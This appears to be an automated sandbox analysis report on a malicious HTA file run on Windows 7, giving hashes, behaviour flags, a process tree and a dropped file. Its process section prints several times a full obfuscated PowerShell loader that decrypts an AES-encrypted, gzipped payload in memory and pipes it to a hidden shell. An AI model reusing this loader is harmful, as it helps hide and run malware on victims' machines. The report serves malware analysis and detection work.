Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
12/02/2024, 04:28
Static task
static1
Behavioral task
behavioral1
Sample
ff67692abc453dbbc9c8d70bb6d623197171fd4604d82b6adccc53c2e1db4d9b.hta
Resource
win7-20231215-en
General
-
Target
ff67692abc453dbbc9c8d70bb6d623197171fd4604d82b6adccc53c2e1db4d9b.hta
-
Size
1.3MB
-
MD5
9c63ac93a4b34f999a4283409af471ed
-
SHA1
4b03914c7cbb4bc61e6097846e3cc49bad153140
-
SHA256
ff67692abc453dbbc9c8d70bb6d623197171fd4604d82b6adccc53c2e1db4d9b
-
SHA512
f712e7b1d528dd989b860a04dd057cfd4c92152a6f2f35df5176bf3db7fb7a4a994849c7bab9c61003ecf5a8cc52197c88237c5475aaa04ad0031fb0929e6843
-
SSDEEP
3072:PSE1iZfQZUcaJgF4oHDgXN4Wy5iAlb2t5YRyrR3Ry/4dE4J0Yut3n8E:PSE1iuZU0lcXiWazUtlTZ0ht3n8E
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1960 powershell.exe 1960 powershell.exe 1960 powershell.exe 2584 powershell.exe 2796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1960 powershell.exe Token: SeDebugPrivilege 2584 powershell.exe Token: SeDebugPrivilege 2796 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2072 wrote to memory of 1960 2072 mshta.exe 29 PID 2072 wrote to memory of 1960 2072 mshta.exe 29 PID 2072 wrote to memory of 1960 2072 mshta.exe 29 PID 2072 wrote to memory of 1960 2072 mshta.exe 29 PID 1960 wrote to memory of 2800 1960 powershell.exe 33 PID 1960 wrote to memory of 2800 1960 powershell.exe 33 PID 1960 wrote to memory of 2800 1960 powershell.exe 33 PID 1960 wrote to memory of 2800 1960 powershell.exe 33 PID 2800 wrote to memory of 2584 2800 cmd.exe 31 PID 2800 wrote to memory of 2584 2800 cmd.exe 31 PID 2800 wrote to memory of 2584 2800 cmd.exe 31 PID 2800 wrote to memory of 2584 2800 cmd.exe 31 PID 2800 wrote to memory of 2796 2800 cmd.exe 30 PID 2800 wrote to memory of 2796 2800 cmd.exe 30 PID 2800 wrote to memory of 2796 2800 cmd.exe 30 PID 2800 wrote to memory of 2796 2800 cmd.exe 30
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\ff67692abc453dbbc9c8d70bb6d623197171fd4604d82b6adccc53c2e1db4d9b.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $zQnYK = 'AAAAAAAAAAAAAAAAAAAAACXupjrcv5ymMTmzsb9HMj07g0fGYk2bbVGWdYfCvOdwpdgs3KfPBEGflsg4MYw7wGvpkM9EJZH7F6vXugnc2Lz8KIiGf03nygEs55hK43MDHMMgyNslGWtSzy7Yfiq6G9uIVqYBZpXFfmUZgtCvSGCzt7tckibs0i23AyyDkoy0dDCwTMryCdzyYQRVgUjfHYU145udUimQ0TwkwAmjzFVeCCW+IQnodfAy3x19IvCgMHB1/7dsyclFh+gWpQ+iQUxS1WTmVYc8sSR8GAwt7ZWSnGqo9+wZspkmVDW+vNOyr1nbI1ENdgDd/Vie7Q47nePVzyykP0WORqguPXpSH/O9kld7HXQ+Dgad9lLP0dWwRudTYUFfP6uApJb8EGgfX5FPWzKIyqWQXxjYE3egEBzFzyOVat/eyCz1xyaHXMZNBSY/pJ4W57DTWQM/fHDLVKAZYrK+ZVj3FjnGNucBPhxgXMz7SnZb4J+nL4BrcgQ4kWRtffTvi3C60/nED5s/Hzpm567v1oC5ULWlyI6KuEB/XPedLe9iM3waBDbD12EIL9da5QOQv3bM1QHDsWfotmKsFyUrDwkmAOIb5JZ9VW+d8ZEnSFsbdeQgHDUt147oUHGoGQfquMcoCKS9I1k7cDjIVlslxtvdw4cq2M62VWFKlCpvsFkRKiVtGQ0xTgECkRjGw8FOIc7O0PeU0he13srDyg80LcAK0FbL/TrVLZ/MW+6CTnbL2RjoGOiPaGXPyvZpSwNA/V7rAfjwoQ0wXPAEfhBw4p7eWaKQKH/l2pMIwimecm+NIQLe/AlvTUivadjBkzB+r+mWbVZ1KKOdjj87WtPNlvmAX0aH4YV1WZnpNdeyHQ8QQzPxZs4ESiFnS2tJEO5oPZzUKxoGULupJTg3qDjrvizbY92amhetyETM+N3nSC2Yy7uQhOSUZqgARp0gg3Z8cq9hk0F59VLIqGcsUjxwnbuLd4UiNaonNgNahyabt1Pzilx+8c5/XEy0g/4YdsOQnIRBAu0WXJLmsxkoSHq3JuZXEgpOHZTiPL2Y2tiML+aAM5vUpar6eiOtigWXqUUbc+YUHJmDvUW7R5cDAGjT52ysT9Zg8BDvYmmo5FMNtbmZPF7/sCKPduUP';$SsVIx = 'Y1JzVWdra0xsVUF3THl6ZGxuaFhucktwSGJhTmdod0E=';$HUHUVe = New-Object 'System.Security.Cryptography.AesManaged';$HUHUVe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HUHUVe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HUHUVe.BlockSize = 128;$HUHUVe.KeySize = 256;$HUHUVe.Key = [System.Convert]::FromBase64String($SsVIx);$LTpyn = [System.Convert]::FromBase64String($zQnYK);$jBYKFano = $LTpyn[0..15];$HUHUVe.IV = $jBYKFano;$pZHBtYCTs = $HUHUVe.CreateDecryptor();$qfwLxAoVP = $pZHBtYCTs.TransformFinalBlock($LTpyn, 16, $LTpyn.Length - 16);$HUHUVe.Dispose();$SRohYcy = New-Object System.IO.MemoryStream( , $qfwLxAoVP );$jlLrbjuo = New-Object System.IO.MemoryStream;$auncLVdzc = New-Object System.IO.Compression.GzipStream $SRohYcy, ([IO.Compression.CompressionMode]::Decompress);$auncLVdzc.CopyTo( $jlLrbjuo );$auncLVdzc.Close();$SRohYcy.Close();[byte[]] $cQoYS = $jlLrbjuo.ToArray();$lBjpq = [System.Text.Encoding]::UTF8.GetString($cQoYS);$lBjpq | powershell - }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe $zQnYK = 'AAAAAAAAAAAAAAAAAAAAACXupjrcv5ymMTmzsb9HMj07g0fGYk2bbVGWdYfCvOdwpdgs3KfPBEGflsg4MYw7wGvpkM9EJZH7F6vXugnc2Lz8KIiGf03nygEs55hK43MDHMMgyNslGWtSzy7Yfiq6G9uIVqYBZpXFfmUZgtCvSGCzt7tckibs0i23AyyDkoy0dDCwTMryCdzyYQRVgUjfHYU145udUimQ0TwkwAmjzFVeCCW+IQnodfAy3x19IvCgMHB1/7dsyclFh+gWpQ+iQUxS1WTmVYc8sSR8GAwt7ZWSnGqo9+wZspkmVDW+vNOyr1nbI1ENdgDd/Vie7Q47nePVzyykP0WORqguPXpSH/O9kld7HXQ+Dgad9lLP0dWwRudTYUFfP6uApJb8EGgfX5FPWzKIyqWQXxjYE3egEBzFzyOVat/eyCz1xyaHXMZNBSY/pJ4W57DTWQM/fHDLVKAZYrK+ZVj3FjnGNucBPhxgXMz7SnZb4J+nL4BrcgQ4kWRtffTvi3C60/nED5s/Hzpm567v1oC5ULWlyI6KuEB/XPedLe9iM3waBDbD12EIL9da5QOQv3bM1QHDsWfotmKsFyUrDwkmAOIb5JZ9VW+d8ZEnSFsbdeQgHDUt147oUHGoGQfquMcoCKS9I1k7cDjIVlslxtvdw4cq2M62VWFKlCpvsFkRKiVtGQ0xTgECkRjGw8FOIc7O0PeU0he13srDyg80LcAK0FbL/TrVLZ/MW+6CTnbL2RjoGOiPaGXPyvZpSwNA/V7rAfjwoQ0wXPAEfhBw4p7eWaKQKH/l2pMIwimecm+NIQLe/AlvTUivadjBkzB+r+mWbVZ1KKOdjj87WtPNlvmAX0aH4YV1WZnpNdeyHQ8QQzPxZs4ESiFnS2tJEO5oPZzUKxoGULupJTg3qDjrvizbY92amhetyETM+N3nSC2Yy7uQhOSUZqgARp0gg3Z8cq9hk0F59VLIqGcsUjxwnbuLd4UiNaonNgNahyabt1Pzilx+8c5/XEy0g/4YdsOQnIRBAu0WXJLmsxkoSHq3JuZXEgpOHZTiPL2Y2tiML+aAM5vUpar6eiOtigWXqUUbc+YUHJmDvUW7R5cDAGjT52ysT9Zg8BDvYmmo5FMNtbmZPF7/sCKPduUP';$SsVIx = 'Y1JzVWdra0xsVUF3THl6ZGxuaFhucktwSGJhTmdod0E=';$HUHUVe = New-Object 'System.Security.Cryptography.AesManaged';$HUHUVe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HUHUVe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HUHUVe.BlockSize = 128;$HUHUVe.KeySize = 256;$HUHUVe.Key = [System.Convert]::FromBase64String($SsVIx);$LTpyn = [System.Convert]::FromBase64String($zQnYK);$jBYKFano = $LTpyn[0..15];$HUHUVe.IV = $jBYKFano;$pZHBtYCTs = $HUHUVe.CreateDecryptor();$qfwLxAoVP = $pZHBtYCTs.TransformFinalBlock($LTpyn, 16, $LTpyn.Length - 16);$HUHUVe.Dispose();$SRohYcy = New-Object System.IO.MemoryStream( , $qfwLxAoVP );$jlLrbjuo = New-Object System.IO.MemoryStream;$auncLVdzc = New-Object System.IO.Compression.GzipStream $SRohYcy, ([IO.Compression.CompressionMode]::Decompress);$auncLVdzc.CopyTo( $jlLrbjuo );$auncLVdzc.Close();$SRohYcy.Close();[byte[]] $cQoYS = $jlLrbjuo.ToArray();$lBjpq = [System.Text.Encoding]::UTF8.GetString($cQoYS);$lBjpq | powershell -3⤵
- Suspicious use of WriteProcessMemory
PID:2800
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe $zQnYK = 'AAAAAAAAAAAAAAAAAAAAACXupjrcv5ymMTmzsb9HMj07g0fGYk2bbVGWdYfCvOdwpdgs3KfPBEGflsg4MYw7wGvpkM9EJZH7F6vXugnc2Lz8KIiGf03nygEs55hK43MDHMMgyNslGWtSzy7Yfiq6G9uIVqYBZpXFfmUZgtCvSGCzt7tckibs0i23AyyDkoy0dDCwTMryCdzyYQRVgUjfHYU145udUimQ0TwkwAmjzFVeCCW+IQnodfAy3x19IvCgMHB1/7dsyclFh+gWpQ+iQUxS1WTmVYc8sSR8GAwt7ZWSnGqo9+wZspkmVDW+vNOyr1nbI1ENdgDd/Vie7Q47nePVzyykP0WORqguPXpSH/O9kld7HXQ+Dgad9lLP0dWwRudTYUFfP6uApJb8EGgfX5FPWzKIyqWQXxjYE3egEBzFzyOVat/eyCz1xyaHXMZNBSY/pJ4W57DTWQM/fHDLVKAZYrK+ZVj3FjnGNucBPhxgXMz7SnZb4J+nL4BrcgQ4kWRtffTvi3C60/nED5s/Hzpm567v1oC5ULWlyI6KuEB/XPedLe9iM3waBDbD12EIL9da5QOQv3bM1QHDsWfotmKsFyUrDwkmAOIb5JZ9VW+d8ZEnSFsbdeQgHDUt147oUHGoGQfquMcoCKS9I1k7cDjIVlslxtvdw4cq2M62VWFKlCpvsFkRKiVtGQ0xTgECkRjGw8FOIc7O0PeU0he13srDyg80LcAK0FbL/TrVLZ/MW+6CTnbL2RjoGOiPaGXPyvZpSwNA/V7rAfjwoQ0wXPAEfhBw4p7eWaKQKH/l2pMIwimecm+NIQLe/AlvTUivadjBkzB+r+mWbVZ1KKOdjj87WtPNlvmAX0aH4YV1WZnpNdeyHQ8QQzPxZs4ESiFnS2tJEO5oPZzUKxoGULupJTg3qDjrvizbY92amhetyETM+N3nSC2Yy7uQhOSUZqgARp0gg3Z8cq9hk0F59VLIqGcsUjxwnbuLd4UiNaonNgNahyabt1Pzilx+8c5/XEy0g/4YdsOQnIRBAu0WXJLmsxkoSHq3JuZXEgpOHZTiPL2Y2tiML+aAM5vUpar6eiOtigWXqUUbc+YUHJmDvUW7R5cDAGjT52ysT9Zg8BDvYmmo5FMNtbmZPF7/sCKPduUP';$SsVIx = 'Y1JzVWdra0xsVUF3THl6ZGxuaFhucktwSGJhTmdod0E=';$HUHUVe = New-Object 'System.Security.Cryptography.AesManaged';$HUHUVe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HUHUVe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HUHUVe.BlockSize = 128;$HUHUVe.KeySize = 256;$HUHUVe.Key = [System.Convert]::FromBase64String($SsVIx);$LTpyn = [System.Convert]::FromBase64String($zQnYK);$jBYKFano = $LTpyn[0..15];$HUHUVe.IV = $jBYKFano;$pZHBtYCTs = $HUHUVe.CreateDecryptor();$qfwLxAoVP = $pZHBtYCTs.TransformFinalBlock($LTpyn, 16, $LTpyn.Length - 16);$HUHUVe.Dispose();$SRohYcy = New-Object System.IO.MemoryStream( , $qfwLxAoVP );$jlLrbjuo = New-Object System.IO.MemoryStream;$auncLVdzc = New-Object System.IO.Compression.GzipStream $SRohYcy, ([IO.Compression.CompressionMode]::Decompress);$auncLVdzc.CopyTo( $jlLrbjuo );$auncLVdzc.Close();$SRohYcy.Close();[byte[]] $cQoYS = $jlLrbjuo.ToArray();$lBjpq = [System.Text.Encoding]::UTF8.GetString($cQoYS);$lBjpq1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5a5a454e2089fe4a70c83522aeb718b1d
SHA1d21857577aa7fa047b8c13424ccc0c9d134d989b
SHA256eefab11dc7e2119971f789cf6fa5d1647c881fab11a4b9befe7aa0d5f059b8a3
SHA512edafe302004353f3e28cf46d7691746168394369911ee5e68cb919632c988cbd1878389bca9e9ee947e6188508bc9a3a6878c40c326c59d3358bbac8b831b3d2